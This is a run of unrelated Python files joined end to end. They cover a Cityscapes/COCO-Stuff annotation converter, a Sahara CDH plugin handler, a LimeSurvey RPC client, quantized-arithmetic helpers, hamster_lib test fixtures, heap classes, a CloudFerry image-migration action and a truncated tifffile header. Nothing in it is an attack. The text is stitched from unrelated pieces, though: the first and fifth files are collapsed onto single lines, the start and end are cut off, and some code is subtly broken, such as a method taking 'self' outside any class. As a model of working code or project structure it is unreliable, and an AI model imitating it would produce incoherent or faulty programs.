help="data dir for annotations to be converted", default=None, type=str) if len(sys.argv) == 1: parser.print_help() sys.exit(1) return parser.parse_args() def convert_coco_stuff_mat(data_dir, out_dir): """Convert to png and save json with path. This currently only contains the segmentation labels for objects+stuff in cocostuff - if we need to combine with other labels from original COCO that will be a TODO.""" sets = ['train', 'val'] categories = [] json_name = 'coco_stuff_%s.json' ann_dict = {} for data_set in sets: file_list = os.path.join(data_dir, '%s.txt') images = [] with open(file_list % data_set) as f: for img_id, img_name in enumerate(f): img_name = img_name.replace('coco', 'COCO').strip('\n') image = {} mat_file = os.path.join( data_dir, 'annotations/%s.mat' % img_name) data = h5py.File(mat_file, 'r') labelMap = data.get('S') if len(categories) == 0: labelNames = data.get('names') for idx, n in enumerate(labelNames): categories.append( {"id": idx, "name": ''.join(chr(i) for i in data[ n[0]])}) ann_dict['categories'] = categories imageio.imsave( os.path.join(data_dir, img_name + '.png'), labelMap) image['width'] = labelMap.shape[0] image['height'] = labelMap.shape[1] image['file_name'] = img_name image['seg_file_name'] = img_name image['id'] = img_id images.append(image) ann_dict['images'] = images print("Num images: %s" % len(images)) with open(os.path.join(out_dir, json_name % data_set), 'wb') as outfile: outfile.write(json.dumps(ann_dict)) # for Cityscapes def getLabelID(self, instID): if (instID < 1000): return instID else: return int(instID / 1000) def convert_cityscapes_instance_only( data_dir, out_dir): """Convert from cityscapes format to COCO instance seg format - polygons""" sets = [ 'gtFine_val', # 'gtFine_train', # 'gtFine_test', # 'gtCoarse_train', # 'gtCoarse_val', # 'gtCoarse_train_extra' ] ann_dirs = [ 'gtFine_trainvaltest/gtFine/val', # 'gtFine_trainvaltest/gtFine/train', # 'gtFine_trainvaltest/gtFine/test', # 'gtCoarse/train', # 'gtCoarse/train_extra', # 'gtCoarse/val' ] json_name = 'instancesonly_filtered_%s.json' ends_in = '%s_polygons.json' img_id = 0 ann_id = 0 cat_id = 1 category_dict = {} category_instancesonly = [ 
'person', 'rider', 'car', 'truck', 'bus', 'train', 'motorcycle', 'bicycle', ] for data_set, ann_dir in zip(sets, ann_dirs): print('Starting %s' % data_set) ann_dict = {} images = [] annotations = [] ann_dir = os.path.join(data_dir, ann_dir) for root, _, files in os.walk(ann_dir): for filename in files: if filename.endswith(ends_in % data_set.split('_')[0]): if len(images) % 50 == 0: print("Processed %s images, %s annotations" % ( len(images), len(annotations))) json_ann = json.load(open(os.path.join(root, filename))) image = {} image['id'] = img_id img_id += 1 image['width'] = json_ann['imgWidth'] image['height'] = json_ann['imgHeight'] image['file_name'] = filename[:-len( ends_in % data_set.split('_')[0])] + 'leftImg8bit.png' image['seg_file_name'] = filename[:-len( ends_in % data_set.split('_')[0])] + \ '%s_instanceIds.png' % data_set.split('_')[0] images.append(image) fullname = os.path.join(root, image['seg_file_name']) objects = cs.instances2dict_with_polygons( [fullname], verbose=False)[fullname] for object_cls in objects: if object_cls not in category_instancesonly: continue # skip non-instance categories for obj in objects[object_cls]: if obj['contours'] == []: print('Warning: empty contours.') continue # skip non-instance categories len_p = [len(p) for p in obj['contours']] if min(len_p) <= 4: print('Warning: invalid contours.') continue # skip non-instance categories ann = {} ann['id'] = ann_id ann_id += 1 ann['image_id'] = image['id'] ann['segmentation'] = obj['contours'] if object_cls not in category_dict: category_dict[object_cls] = cat_id cat_id += 1 ann['category_id'] = category_dict[object_cls] ann['iscrowd'] = 0 ann['area'] = obj['pixelCount'] ann['bbox'] = bboxs_util.xyxy_to_xywh( segms_util.polys_to_boxes( [ann['segmentation']])).tolist()[0] annotations.append(ann) ann_dict['images'] = images categories = [{"id": category_dict[name], "name": name} for name in category_dict] ann_dict['categories'] = categories ann_dict['annotations'] = annotations print("Num categories: %s" % len(categories)) print("Num images: %s" % len(images)) print("Num annotations: %s" % len(annotations)) with open(os.path.join(out_dir, json_name % data_set), 'wb') as outfile: outfile.write(json.dumps(ann_dict)) if __name__ == '__main__': args = parse_args() if args.dataset == "cityscapes_instance_only": convert_cityscapes_instance_only(args.datadir, args.outdir) elif args.dataset == "cocostuff": convert_coco_stuff_mat(args.datadir, args.outdir) else: print("Dataset not supported: %s" % args.dataset)
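# Invocation sketch (the script file name and the paths are placeholders; the
# flag names and dataset values come from parse_args() and the dispatch above):
#
#     python convert_cityscapes_to_coco.py \
#         --dataset cityscapes_instance_only \
#         --datadir /data/cityscapes \
#         --outdir /data/cityscapes/annotations_coco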
# Copyright (c) 2015 Intel Corporation
# Copyright (c) 2015 ISPRAS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from sahara.plugins.cdh import abstractversionhandler as avm
from sahara.plugins.cdh.v5_4_0 import cloudera_utils
from sahara.plugins.cdh.v5_4_0 import config_helper
from sahara.plugins.cdh.v5_4_0 import deploy
from sahara.plugins.cdh.v5_4_0 import edp_engine
from sahara.plugins.cdh.v5_4_0 import plugin_utils
from sahara.plugins.cdh.v5_4_0 import validation


class VersionHandler(avm.BaseVersionHandler):

    def __init__(self):
        super(VersionHandler, self).__init__()
        self.config_helper = config_helper.ConfigHelperV540()
        self.cloudera_utils = cloudera_utils.ClouderaUtilsV540()
        self.plugin_utils = plugin_utils.PluginUtilsV540()
        self.deploy = deploy
        self.edp_engine = edp_engine
        self.validation = validation.ValidatorV540()

    def get_node_processes(self):
        return {
            "CLOUDERA": ['CLOUDERA_MANAGER'],
            "HDFS": ['HDFS_NAMENODE', 'HDFS_DATANODE',
                     'HDFS_SECONDARYNAMENODE', 'HDFS_JOURNALNODE'],
            "YARN": ['YARN_RESOURCEMANAGER', 'YARN_NODEMANAGER',
                     'YARN_JOBHISTORY', 'YARN_STANDBYRM'],
            "OOZIE": ['OOZIE_SERVER'],
            "HIVE": ['HIVE_SERVER2', 'HIVE_METASTORE', 'HIVE_WEBHCAT'],
            "HUE": ['HUE_SERVER'],
            "SPARK_ON_YARN": ['SPARK_YARN_HISTORY_SERVER'],
            "ZOOKEEPER": ['ZOOKEEPER_SERVER'],
            "HBASE": ['HBASE_MASTER', 'HBASE_REGIONSERVER'],
            "FLUME": ['FLUME_AGENT'],
            "IMPALA": ['IMPALA_CATALOGSERVER', 'IMPALA_STATESTORE', 'IMPALAD'],
            "KS_INDEXER": ['KEY_VALUE_STORE_INDEXER'],
            "SOLR": ['SOLR_SERVER'],
            "SQOOP": ['SQOOP_SERVER'],
            "SENTRY": ['SENTRY_SERVER'],
            "KMS": ['KMS'],

            "YARN_GATEWAY": [],
            "RESOURCEMANAGER": [],
            "NODEMANAGER": [],
            "JOBHISTORY": [],

            "HDFS_GATEWAY": [],
            'DATANODE': [],
            'NAMENODE': [],
            'SECONDARYNAMENODE': [],
            'JOURNALNODE': [],
            'REGIONSERVER': [],
            'MASTER': [],
            'HIVEMETASTORE': [],
            'HIVESERVER': [],
            'WEBCAT': [],
            'CATALOGSERVER': [],
            'STATESTORE': [],
            'IMPALAD': [],
        }

    def get_edp_engine(self, cluster, job_type):
        oozie_type = self.edp_engine.EdpOozieEngine.get_supported_job_types()
        spark_type = self.edp_engine.EdpSparkEngine.get_supported_job_types()
        if job_type in oozie_type:
            return self.edp_engine.EdpOozieEngine(cluster)
        if job_type in spark_type:
            return self.edp_engine.EdpSparkEngine(cluster)
        return None

    def get_edp_job_types(self):
        return (edp_engine.EdpOozieEngine.get_supported_job_types() +
                edp_engine.EdpSparkEngine.get_supported_job_types())
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import json
from uuid import uuid4

headers = {'content-type': 'application/json'}


def set_params(method, params):
    """Build the JSON-RPC payload used to query LimeSurvey."""
    data = {'method': method,
            'params': params,
            'id': str(uuid4())}
    return json.dumps(data)


def get_session_key(limedict):
    """Open a session. Receives a dictionary with connection parameters:

    {"url": "full path for remote control",
     "username": "account name to be used",
     "password": "password for account"}
    """
    url = limedict['url']
    user = limedict['username']
    password = limedict['password']
    params = {'username': user, 'password': password}
    data = set_params('get_session_key', params)
    req = requests.post(url, data=data, headers=headers)
    return {'token': req.json()['result'], 'user': user, 'url': url}


def list_surveys(session):
    """Retrieve a list of surveys owned by the current user."""
    params = {'sUser': session['user'], 'sSessionKey': session['token']}
    data = set_params('list_surveys', params)
    req = requests.post(session['url'], data=data, headers=headers)
    return req.text
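# Usage sketch (the endpoint URL and credentials are placeholders for a real
# LimeSurvey RemoteControl 2 installation).
if __name__ == '__main__':
    connection = {
        'url': 'https://example.org/limesurvey/index.php/admin/remotecontrol',
        'username': 'admin',
        'password': 'secret',
    }
    session = get_session_key(connection)   # {'token': ..., 'user': ..., 'url': ...}
    print(list_surveys(session))            # raw JSON-RPC response text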
import numpy as np

# Maximum value representable with 8 bits
QUANTIZE_BIT = 8
MAX_VALUE = (2 ** QUANTIZE_BIT) - 1


def deQuantize_scalar(x, min, max):
    """Undo the quantization of a scalar."""
    gain = (max - min) / MAX_VALUE
    return x * gain + min


def deQuantize(arr, a_min, a_max):
    """Undo the quantization of an array."""
    gain = (a_max - a_min) / MAX_VALUE
    return arr * gain + a_min


def Quantize(arr, min, max):
    """Quantize an array into the 8-bit range."""
    range = (max - min)
    range_scale = range / MAX_VALUE
    return ((arr - min) / range_scale).astype(int)


def reQuantize(arr, q_min, q_max, new_min, new_max):
    mid = (q_max + q_min) / 2
    gain = MAX_VALUE / (q_max - q_min)
    # start vector
    c_qt = (arr - mid) * gain + (MAX_VALUE / 2)
    return c_qt.astype(int)


def q_inv(a_qt, a_min, a_max):
    """Sign inversion (negation) in the quantized domain."""
    return MAX_VALUE - a_qt, -a_max, -a_min


def q_add(a_qt, a_min, a_max, b_qt, b_min, b_max, debug=False):
    """Addition in the quantized domain."""
    gain = (b_max - b_min) / (a_max - a_min)
    min = a_min + b_min
    max = a_max + b_max
    q_param = (a_max - a_min) / (max - min)
    # debug
    if debug:
        print("gain = %f(%x), q_param = %f(%x)" %
              (gain, int(gain * (2 ** 8)), q_param, int(q_param * (2 ** 8))))
    # start vector
    c_qt = b_qt * gain + a_qt
    c_qt *= q_param
    return c_qt.astype(int), min, max


def q_mul(a_qt, a_min, a_max, b_qt, b_min, b_max, debug=False):
    """Multiplication in the quantized domain."""
    Adash_max = a_max - a_min
    Adash_min = 0.0
    Bdash_max = b_max - b_min
    Bdash_min = 0.0

    # constant mul
    if b_min < 0:
        # sign inversion
        qt_A_bmin, A_bmin_min_inv, A_bmin_max_inv = q_inv(a_qt, a_min, a_max)
        # constant scaling
        A_bmin_min = A_bmin_min_inv * -b_min
        A_bmin_max = A_bmin_max_inv * -b_min
        if debug:
            print("SEL A INV")
    else:
        A_bmin_max = a_max * b_min
        A_bmin_min = a_min * b_min
        qt_A_bmin = a_qt

    if a_min < 0:
        qt_B_amin, B_amin_min_inv, B_amin_max_inv = q_inv(b_qt, b_min, b_max)
        B_amin_max = B_amin_max_inv * -a_min
        B_amin_min = B_amin_min_inv * -a_min
        if debug:
            print("SEL B INV")
    else:
        B_amin_max = b_max * a_min
        B_amin_min = b_min * a_min
        qt_B_amin = b_qt

    # vector
    AdBd_qt, AdBd_min, AdBd_max = q_mul_core(a_qt, Adash_min, Adash_max,
                                             b_qt, Bdash_min, Bdash_max,
                                             debug=debug)
    C_qt_0, C_qt_0_min, C_qt_0_max = q_add(qt_A_bmin, A_bmin_min, A_bmin_max,
                                           qt_B_amin, B_amin_min, B_amin_max,
                                           debug=debug)
    C_qt, c_min, c_max = q_add(AdBd_qt, AdBd_min, AdBd_max,
                               C_qt_0, C_qt_0_min, C_qt_0_max,
                               debug=debug)

    if debug:
        np.savetxt("AdBd_qt.txt", AdBd_qt, fmt="%d")
        np.savetxt("qt_A_bmin.txt", qt_A_bmin, fmt="%d")
        np.savetxt("qt_B_amin.txt", qt_B_amin, fmt="%d")
        np.savetxt("C_qt_0.txt", C_qt_0, fmt="%d")
        np.savetxt("C_qt.txt", C_qt, fmt="%d")

    f1 = a_min * b_min
    c_max_f = c_max - f1
    c_min_f = c_min - f1
    return C_qt.astype(int), c_min_f, c_max_f


def q_mul_core(a_qt, a_min, a_max, b_qt, b_min, b_max, debug=False):
    """Core of quantized multiplication."""
    gain_a = (a_max - a_min) / MAX_VALUE
    gain_b = (b_max - b_min) / MAX_VALUE
    min = a_min * b_min
    max = a_max * b_max
    q_param = MAX_VALUE / (max - min)

    p_gagb = gain_a * gain_b * q_param
    p_gaob = gain_a * b_min * q_param
    p_gboa = gain_b * a_min * q_param

    if debug:
        print("p_gagb = %f(%d), p_gaob = %f(%d), p_gboa = %f(%d)" %
              (p_gagb, int(p_gagb * (2 ** 16)),
               p_gaob, int(p_gaob * (2 ** 8)),
               p_gboa, int(p_gboa * (2 ** 8))))

    # start vector alu
    AB = (p_gagb * a_qt * b_qt).astype(int)
    c_qt = AB
    # gaob_A = (a_qt * p_gaob).astype(int)
    # gboa_B = (b_qt * p_gboa).astype(int)
    # c_qt = AB + gaob_A + gboa_B
    return c_qt.astype(int), min, max
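# Round-trip sketch (added for illustration; the value range is arbitrary).
if __name__ == '__main__':
    x = np.linspace(-1.0, 1.0, 5)
    x_qt = Quantize(x, x.min(), x.max())          # integer codes in [0, 255]
    x_back = deQuantize(x_qt, x.min(), x.max())   # approximate reconstruction
    print(x_qt)      # [  0  63 127 191 255]
    print(x_back)    # close to x, up to quantization error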
# -*- encoding: utf-8 -*- """Fixtures that are of general use.""" from __future__ import unicode_literals import datetime import faker as faker_ import pytest from hamster_lib.lib import HamsterControl from hamster_lib.storage import BaseStore from pytest_factoryboy import register from . import factories register(factories.CategoryFactory) register(factories.ActivityFactory) register(factories.TagFactory) register(factories.FactFactory) faker = faker_.Faker() def convert_time_to_datetime(time_string): """ Helper method. If given a %H:%M string, return a datetime.datetime object with todays date. """ return datetime.datetime.combine( datetime.datetime.now().date(), datetime.datetime.strptime(time_string, "%H:%M").time() ) # Controller @pytest.yield_fixture def controller(base_config): """Provide a basic controller.""" # [TODO] Parametrize over all available stores. controller = HamsterControl(base_config) yield controller controller.store.cleanup() @pytest.fixture def basestore(base_config): """Provide a generic ``storage.BaseStore`` instance using ``baseconfig``.""" store = BaseStore(base_config) return store # Categories @pytest.fixture(params=(None, True,)) def category_valid_parametrized(request, category_factory, name_string_valid_parametrized): """Provide a variety of valid category fixtures.""" if request.param: result = category_factory(name=name_string_valid_parametrized) else: result = None return result @pytest.fixture def category_valid_parametrized_without_none(request, category_factory, name_string_valid_parametrized): """ Provide a parametrized category fixture but not ``None``. This fixuture will represent a wide array of potential name charsets as well but not ``category=None``. """ return category_factory(name=name_string_valid_parametrized) # Activities @pytest.fixture def activity_valid_parametrized(request, activity_factory, name_string_valid_parametrized, category_valid_parametrized, deleted_valid_parametrized): """Provide a huge array of possible activity versions. Including None.""" return activity_factory(name=name_string_valid_parametrized, category=category_valid_parametrized, deleted=deleted_valid_parametrized) @pytest.fixture def new_activity_values(category): """Return garanteed modified values for a given activity.""" def modify(activity): return { 'name': activity.name + 'foobar', } return modify # Facts @pytest.fixture def fact_factory(): """Return a factory class that generates non-persisting Fact instances.""" return factories.FactFactory.build @pytest.fixture def fact(): """Provide a randomized non-persistant Fact-instance.""" return factories.FactFactory.build() @pytest.fixture def list_of_facts(fact_factory): """ Provide a factory that returns a list with given amount of Fact instances. The key point here is that these fact *do not overlap*! 
""" def get_list_of_facts(number_of_facts): facts = [] old_start = datetime.datetime.now() offset = datetime.timedelta(hours=4) for i in range(number_of_facts): start = old_start + offset facts.append(fact_factory(start=start)) old_start = start return facts return get_list_of_facts @pytest.fixture(params=('%M', '%H:%M')) def string_delta_format_parametrized(request): """Provide all possible format option for ``Fact().get_string_delta()``.""" return request.param @pytest.fixture def today_fact(fact_factory): """Return a ``Fact`` instance that start and ends 'today'.""" start = datetime.datetime.now() end = start + datetime.timedelta(minutes=30) return fact_factory(start=start, end=end) @pytest.fixture def not_today_fact(fact_factory): """Return a ``Fact`` instance that neither start nor ends 'today'.""" start = datetime.datetime.now() - datetime.timedelta(days=2) end = start + datetime.timedelta(minutes=30) return fact_factory(start=start, end=end) @pytest.fixture def current_fact(fact_factory): """Provide a ``ongoing fact``. That is a fact that has started but not ended yet.""" return fact_factory(start=datetime.datetime.now(), end=None) @pytest.fixture(params=[ '12:00 - 14:00 foo@bar, rumpelratz', '12:00 - 14:00 foo', 'foo@bar', # For the following there should not be successful start/end parsing but # instead just one big "activity.name, but it still constitutes a formally # valid fact. If we want to be more accurate we need to work with clear # expectations. '12:00-14:00 foo@bar', ]) def valid_raw_fact_parametrized(request): """Return various invalid ``raw fact`` strings.""" return request.param @pytest.fixture(params=[ '', '14:00 - 12:00 foo@bar', '12:00 - 14:00 @bar', ]) def invalid_raw_fact_parametrized(request): """Return various invalid ``raw fact`` strings.""" return request.param @pytest.fixture def raw_fact_with_persistent_activity(persistent_activity): """A raw fact whichs 'activity' is already present in the db.""" return ( '12:00-14:14 {a.name}@{a.category.name}'.format(a=persistent_activity), { 'start': convert_time_to_datetime('12:00'), 'end': convert_time_to_datetime('14:14'), 'activity': persistent_activity.name, 'category': persistent_activity.category.name, 'description': None, }, )
# Implementation of min and max heap data structures
# By: Jacob Rockland

# implementation of heap sort returning list in ascending order, O(n*log(n))
def heap_sort_accending(items):
    heap = MinHeap(items)
    sorted = [heap.extract_min() for i in range(heap.size)]
    return sorted

# implementation of heap sort returning list in descending order, O(n*log(n))
def heap_sort_decending(items):
    heap = MaxHeap(items)
    sorted = [heap.extract_max() for i in range(heap.size)]
    return sorted

# implementation of min-heap
class MinHeap(object):

    # initialize heap
    def __init__(self, items=None):
        if items is None:
            self.heap_list = [None]
            self.size = 0
        else:
            self.build_heap(items)

    # returns string representation of heap
    def __repr__(self):
        temp = self.heap_list[1:]
        return repr(temp)

    # builds a heap from a given list of items, O(n)
    def build_heap(self, items):
        index = len(items) // 2
        self.size = len(items)
        self.heap_list = [None] + items[:]
        while index > 0:
            self.percolate_down(index)
            index -= 1

    # returns minimum item in heap, O(1)
    def get_min(self):
        if self.size > 0:
            return self.heap_list[1]
        else:
            return None

    # inserts a data item into the tree, O(log(n))
    def insert(self, data):
        self.heap_list.append(data)
        self.size += 1
        self.percolate_up(self.size)

    # percolates item in heap list upwards
    def percolate_up(self, index):
        # percolates upwards so long as current node is smaller than parent
        while index // 2 > 0:
            if self.heap_list[index] < self.heap_list[index // 2]:
                temp = self.heap_list[index // 2]
                self.heap_list[index // 2] = self.heap_list[index]
                self.heap_list[index] = temp
            index = index // 2

    # extract the minimum item in heap, O(log(n))
    def extract_min(self):
        if self.size > 0:
            min_val = self.heap_list[1]
            self.heap_list[1] = self.heap_list[self.size]
            self.size -= 1
            self.heap_list.pop()
            self.percolate_down(1)
            return min_val
        else:
            return None

    # percolates item in heap list downwards
    def percolate_down(self, index):
        # percolates downwards so long as current node is greater than child
        while index * 2 <= self.size:
            min = self.min_child(index)
            if self.heap_list[index] > self.heap_list[min]:
                temp = self.heap_list[index]
                self.heap_list[index] = self.heap_list[min]
                self.heap_list[min] = temp
            index = min

    # returns index of smallest child of subtree
    def min_child(self, index):
        if index * 2 + 1 > self.size:
            return index * 2
        elif self.heap_list[index * 2] < self.heap_list[index * 2 + 1]:
            return index * 2
        else:
            return index * 2 + 1

# implementation of max-heap
class MaxHeap(object):

    # initialize heap
    def __init__(self, items=None):
        if items is None:
            self.heap_list = [None]
            self.size = 0
        else:
            self.build_heap(items)

    # returns string representation of heap
    def __repr__(self):
        temp = self.heap_list[1:]
        return repr(temp)

    # builds a heap from a given list of items, O(n)
    def build_heap(self, items):
        index = len(items) // 2
        self.size = len(items)
        self.heap_list = [None] + items[:]
        while index > 0:
            self.percolate_down(index)
            index -= 1

    # returns maximum item in heap, O(1)
    def get_max(self):
        if self.size > 0:
            return self.heap_list[1]
        else:
            return None

    # inserts a data item into the tree, O(log(n))
    def insert(self, data):
        self.heap_list.append(data)
        self.size += 1
        self.percolate_up(self.size)

    # percolates item in heap list upwards
    def percolate_up(self, index):
        # percolates upwards so long as current node is greater than parent
        while index // 2 > 0:
            if self.heap_list[index] > self.heap_list[index // 2]:
                temp = self.heap_list[index // 2]
                self.heap_list[index // 2] = self.heap_list[index]
                self.heap_list[index] = temp
            index = index // 2

    # extract the maximum item in heap, O(log(n))
    def extract_max(self):
        if self.size > 0:
            max_val = self.heap_list[1]
            self.heap_list[1] = self.heap_list[self.size]
            self.size -= 1
            self.heap_list.pop()
            self.percolate_down(1)
            return max_val
        else:
            return None

    # percolates item in heap list downwards
    def percolate_down(self, index):
        # percolates downwards so long as current node is smaller than child
        while index * 2 <= self.size:
            max = self.max_child(index)
            if self.heap_list[index] < self.heap_list[max]:
                temp = self.heap_list[index]
                self.heap_list[index] = self.heap_list[max]
                self.heap_list[max] = temp
            index = max

    # returns index of greatest child of subtree
    def max_child(self, index):
        if index * 2 + 1 > self.size:
            return index * 2
        elif self.heap_list[index * 2] > self.heap_list[index * 2 + 1]:
            return index * 2
        else:
            return index * 2 + 1
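# Usage sketch (added for illustration; not part of the original module).
if __name__ == '__main__':
    data = [7, 2, 9, 4, 1]
    print(heap_sort_accending(data))   # [1, 2, 4, 7, 9]
    print(heap_sort_decending(data))   # [9, 7, 4, 2, 1]

    heap = MinHeap([5, 3, 8])
    heap.insert(1)
    print(heap.get_min())       # 1
    print(heap.extract_min())   # 1; the heap now holds 3, 5, 8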
# Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import copy
import os

from cloudferrylib.base.action import action
from cloudferrylib.utils import files
from cloudferrylib.utils import remote_runner
from cloudferrylib.utils.drivers.ssh_chunks import (verified_file_copy,
                                                    remote_md5_sum)
from cloudferrylib.utils import utils


LOG = utils.get_log(__name__)


class ReCreateBootImage(action.Action):
    def __init__(self, init, cloud=None):
        super(ReCreateBootImage, self).__init__(init, cloud)
        self.src_user = self.cfg.src.ssh_user
        src_password = self.cfg.src.ssh_sudo_password
        self.src_host = self.cfg.src.ssh_host
        self.dst_user = self.cfg.dst.ssh_user
        dst_password = self.cfg.dst.ssh_sudo_password
        self.dst_host = self.cfg.dst.ssh_host
        self.src_runner = remote_runner.RemoteRunner(self.src_host,
                                                     self.src_user,
                                                     password=src_password,
                                                     sudo=True)
        self.dst_runner = remote_runner.RemoteRunner(self.dst_host,
                                                     self.dst_user,
                                                     password=dst_password,
                                                     sudo=True)

    def run(self, images_info=None, compute_ignored_images={},
            missing_images={}, **kwargs):
        """
        Create a boot image on the destination based on the root disk of an
        instance. Use the diff & base images, commit all changes from the diff
        into the base, then copy the base and add it as a glance image. The
        image ID from the source is used as the name of the new image because
        the name of a deleted image cannot be recovered.

        :param images_info: dict with all images on source
        :param compute_ignored_images: not used, just passed down unchanged
        :param missing_images: dict with images that have been removed on
                               source
        :param kwargs: not used

        :return: images_info and compute_ignored_images
        """
        images_info = copy.deepcopy(images_info)
        for vm_id in missing_images:
            img_id = missing_images[vm_id]
            for image_id_src, gl_image in images_info['images'].iteritems():
                if image_id_src == img_id and not gl_image['image']:
                    diff = gl_image['meta']['instance'][0]['diff']['path_src']
                    img_src_host = \
                        gl_image['meta']['instance'][0]['diff']['host_src']
                    if img_src_host != self.src_host:
                        LOG.warning('Different host information. '
                                    'Image is located on host '
                                    '{img_src_host}, but the host in the '
                                    'configuration file is '
                                    '{src_host}.'.format(
                                        img_src_host=img_src_host,
                                        src_host=self.src_host))
                        continue
                    new_img = self.process_image(img_id, diff)
                    gl_image['image']['id'] = new_img['id']
                    gl_image['image']['resource'] = None
                    gl_image['image']['checksum'] = new_img['checksum']
                    gl_image['image']['name'] = img_id
        return {
            'images_info': images_info,
            'compute_ignored_images': compute_ignored_images}

    def process_image(self, img_id=None, diff=None):
        """
        Process the image file: copy it from source to destination and create
        a glance image from it.

        :param img_id: image ID from source
        :param diff: diff file of the root disk for the instance

        :return: dict with the new image ID and its checksum
        """
        with files.RemoteTempDir(self.src_runner) as src_tmp_dir, \
                files.RemoteTempDir(self.dst_runner) as dst_tmp_dir:
            diff_name = 'diff'
            base_name = 'base'
            diff_file = os.path.join(src_tmp_dir, diff_name)
            self.src_runner.run('cp {} {}'.format(diff, diff_file))
            base_file = os.path.join(src_tmp_dir, base_name)
            dst_base_file = os.path.join(dst_tmp_dir, base_name)
            qemu_img_src = self.src_cloud.qemu_img
            base = qemu_img_src.detect_backing_file(diff, self.src_host)
            if base is not None:
                # commit the diff into a copy of its backing file and transfer
                # the flattened base image to the destination
                self.src_runner.run('cp {} {}'.format(base, base_file))
                qemu_img_src.diff_rebase(base_file, diff_file, self.src_host)
                qemu_img_src.diff_commit(src_tmp_dir, diff_name, self.src_host)
                verified_file_copy(self.src_runner, self.dst_runner,
                                   self.dst_user, base_file, dst_base_file,
                                   self.dst_host, 1)
            else:
                # no backing file: the diff itself is the whole root disk
                verified_file_copy(self.src_runner, self.dst_runner,
                                   self.dst_user, diff_file, dst_base_file,
                                   self.dst_host, 1)
            image_resource = self.dst_cloud.resources[utils.IMAGE_RESOURCE]
            image_id = image_resource.glance_img_create(self.dst_runner,
                                                        img_id, 'qcow2',
                                                        dst_base_file)
            checksum = remote_md5_sum(self.dst_runner, dst_base_file)
        return {'id': image_id, 'checksum': checksum}
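
# Not part of the original CloudFerry action: a minimal local sketch, under
# assumed paths, of the qemu-img command sequence that process_image() drives
# remotely through its qemu_img helper (read the backing file from the diff,
# rebase a copy of the diff onto a copy of the base, commit the diff into it).
# The function name and arguments here are hypothetical.
import json
import os
import shutil
import subprocess


def flatten_root_disk(diff_path, workdir):
    # inspect the original diff to find its backing (base) image, if any
    info = json.loads(subprocess.check_output(
        ['qemu-img', 'info', '--output=json', diff_path],
        universal_newlines=True))
    base_path = (info.get('full-backing-filename') or
                 info.get('backing-filename'))

    diff_copy = os.path.join(workdir, 'diff')
    shutil.copy(diff_path, diff_copy)
    if base_path is None:
        # no backing file: the diff already contains the whole root disk
        return diff_copy

    base_copy = os.path.join(workdir, 'base')
    shutil.copy(base_path, base_copy)
    # repoint the copied diff at the copied base, then fold its changes into it
    subprocess.check_call(
        ['qemu-img', 'rebase', '-u', '-b', base_copy, diff_copy])
    subprocess.check_call(['qemu-img', 'commit', diff_copy])
    return base_copy  # now a standalone image suitable for a glance upload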
#!/usr/bin/env python # -*- coding: utf-8 -*- # tifffile.py # Copyright (c) 2008-2014, Christoph Gohlke # Copyright (c) 2008-2014, The Regents of the University of California # Produced at the Laboratory for Fluorescence Dynamics # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the copyright holders nor the names of any # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """Read and write image data from and to TIFF files. Image and metadata can be read from TIFF, BigTIFF, OME-TIFF, STK, LSM, NIH, SGI, ImageJ, MicroManager, FluoView, SEQ and GEL files. Only a subset of the TIFF specification is supported, mainly uncompressed and losslessly compressed 2**(0 to 6) bit integer, 16, 32 and 64-bit float, grayscale and RGB(A) images, which are commonly used in bio-scientific imaging. Specifically, reading JPEG and CCITT compressed image data or EXIF, IPTC, GPS, and XMP metadata is not implemented. Only primary info records are read for STK, FluoView, MicroManager, and NIH image formats. TIFF, the Tagged Image File Format, is under the control of Adobe Systems. BigTIFF allows for files greater than 4 GB. STK, LSM, FluoView, SGI, SEQ, GEL, and OME-TIFF, are custom extensions defined by Molecular Devices (Universal Imaging Corporation), Carl Zeiss MicroImaging, Olympus, Silicon Graphics International, Media Cybernetics, Molecular Dynamics, and the Open Microscopy Environment consortium respectively. For command line usage run ``python tifffile.py --help`` :Author: `Christoph Gohlke <http://www.lfd.uci.edu/~gohlke/>`_ :Organization: Laboratory for Fluorescence Dynamics, University of California, Irvine :Version: 2014.08.24 Requirements ------------ * `CPython 2.7 or 3.4 <http://www.python.org>`_ * `Numpy 1.8.2 <http://www.numpy.org>`_ * `Matplotlib 1.4 <http://www.matplotlib.org>`_ (optional for plotting) * `Tifffile.c 2013.11.05 <http://www.lfd.uci.edu/~gohlke/>`_ (recommended for faster decoding of 